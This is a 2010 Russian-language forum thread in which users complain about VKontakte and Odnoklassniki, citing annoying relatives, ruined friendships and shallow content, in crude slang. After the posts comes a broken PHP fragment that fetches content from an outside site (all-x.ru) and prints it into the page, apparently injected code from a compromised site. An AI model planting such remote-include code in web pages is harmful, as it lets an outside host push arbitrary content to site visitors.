|
вкантакт
|
|
08-26-2010, 17:26
|
|||
|
|||
|
ненависть привела меня сюда! ненавижу вкантакт!!1
а ты ненавидиш вкантакт?! 'Very uncomfortable for the Dormouse,' thought Alice; 'only, as it's asleep, I suppose it doesn't mind.' © |
|||
|
08-26-2010, 17:46
|
|||
|
|||
|
Да.. Иногда.
|
|||
|
08-26-2010, 17:48
|
|||
|
|||
|
Ненавижу одноглазнегов! Сестра когда приходит вечно просит их включить, и в тот же час праведный гнев овладевает мной, ибо знаю я, что она по неопытности своей сейчас будет задавать всякие идиотские вопросы типа: " а почему я нажимаю а оно не нажимаеца" или "а как тут друзей посмотреть" или " а куда такая штука пропала, которая тут была"
И все из-за того, что одна из подруг в их тусе подхватила этот вирус одноглазный, ну и остальне есесно туда же, писать тупые каменты к уродским фоткам и кидать друг другу ссылочки с имбецильными видеоприколами. А на вконтакте мну пофик. Мораль временна, мудрость вечна. |
|||
|
08-26-2010, 17:53
|
|||
|
|||
|
Вконтакт выявляет все худшее в людях. Достаточно сказать, что именно через вконтакт я поссорился с двумя когда-то-друзьями, причем лучшими.
А мир-то все прекраснее и прекраснее! Необходимо срочно над этим поработать. |
|||
|
08-30-2010, 10:13
|
|||
|
|||
|
>писать тупые каменты к уродским фоткам и кидать друг другу ссылочки с имбецильными видеоприколами.
А чем это отличается от форумов, лепры, чанов? >Вконтакт выявляет все худшее в людях Интернет выявляет все худшее в людях *fixd* Юки, ты бы хоть подробнее написал что ли, за что ненавидишь? Меня вот наоборот веселит, когда видишь очередную ТП с автаркой с подрисованными крылышками, розовыми узорчиками по краям и подписью "я такая сучка, что прям не могу". Иногда конечно и до батхерта может довести, но в целом весело. |
|||
|
08-30-2010, 11:12
(Последний раз сообщение было отредактировано 08-30-2010 в 11:13, отредактировал пользователь Yukari.)
|
|||
|
|||
(08-30-2010 10:13)SemOtaku писал(а): Юки, ты бы хоть подробнее написал что ли, за что ненавидишь?взято из чата на сайте: (08-26-2010 17:26)Yukari писал(а): однако вкантакт это пиздец... теперь он не редиректит к нам вообще, ссылаясь на бесплатность хостинга, хотя хост далеко не бесплатен... 'Very uncomfortable for the Dormouse,' thought Alice; 'only, as it's asleep, I suppose it doesn't mind.' © |
|||
|
08-30-2010, 11:48
|
|||
|
|||
|
Похоже, я отдал мальму первенства в категории "самый раковый хикке в этом форуме" другому участнику. Прими мои сердечные поздравления.
А мир-то все прекраснее и прекраснее! Необходимо срочно над этим поработать. |
|||
|
08-30-2010, 12:03
|
|||
|
|||
(08-30-2010 11:48)Кума-сан писал(а): Похоже, я отдал мальму первенства в категории "самый раковый хикке в этом форуме" другому участнику. Прими мои сердечные поздравления.эээ... ы? 'Very uncomfortable for the Dormouse,' thought Alice; 'only, as it's asleep, I suppose it doesn't mind.' © |
|||
|
08-30-2010, 12:24
|
|||
|
|||
(08-30-2010 10:13)SemOtaku писал(а): >писать тупые каменты к уродским фоткам и кидать друг другу ссылочки с имбецильными видеоприколами.Там быдла тоже хватает, но все не так запущено. Градус моралофажества понижен, люди поразнообразнее, менее трепетное отношение к понятиям и традициям. Попадаются люди, которым не чужды идеи саморазвития и противопоставления себя серой толпе. А еще моя сестра туда не лазит и не задает тупые вопросы. Мораль временна, мудрость вечна. |
|||
|
08-30-2010, 13:56
|
|||
|
|||
(08-30-2010 10:13)SemOtaku писал(а): Меня вот наоборот веселит, когда видишь очередную ТП с автаркой с подрисованными крылышками, розовыми узорчиками по краям и подписью "я такая сучка, что прям не могу". Иногда конечно и до батхерта может довести, но в целом весело. Самое интересное какие высокоинтелектуальные группы там присутствуют и особенно выносят мозг их темы с ответами. Меня вконтакте радует возможность найти некоторые фильмы. |
|||
|
« Предыдущая | Следующая »
|
= "http://all-x.ru/?i=21657&c=2"; = @file_get_contents(); echo ; ?>